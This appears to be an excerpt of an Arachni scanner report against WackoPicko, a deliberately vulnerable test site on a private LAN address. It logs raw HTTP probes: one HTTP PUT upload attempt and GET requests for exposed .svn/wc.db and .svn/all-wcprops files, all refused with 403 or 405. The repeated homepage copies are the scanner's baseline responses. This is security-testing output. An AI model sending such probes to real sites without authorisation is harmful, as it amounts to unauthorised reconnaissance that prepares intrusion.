http://192.168.0.26/WackoPicko/css/blueprint/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
.
http://192.168.0.26/WackoPicko/css/blueprint/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP request used to retrieve the page.
PUT /WackoPicko/css/blueprint/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045 Content-Length: 55 Expect: 100-continue Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 100 Continue
HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:52:43 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/css/blueprint/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/css/blueprint/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/css/blueprint/.svn/wc.db
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/css/blueprint/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 202
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/css/blueprint/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/users/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/users/.svn/wc.db
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/users/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:50:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 198
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/users/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/upload/3/.svn/all-wcprops
pointing to
http://192.168.0.26/WackoPicko/upload/3/.svn/all-wcprops
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/upload/3/.svn/all-wcprops HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 203
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/3/.svn/all-wcprops
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/upload/3/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/upload/3/.svn/wc.db
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/upload/3/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:40 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/upload/3/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/pictures/.svn/all-wcprops
pointing to
http://192.168.0.26/WackoPicko/pictures/.svn/all-wcprops
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/pictures/.svn/all-wcprops HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:50:12 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 206
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/pictures/.svn/all-wcprops
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
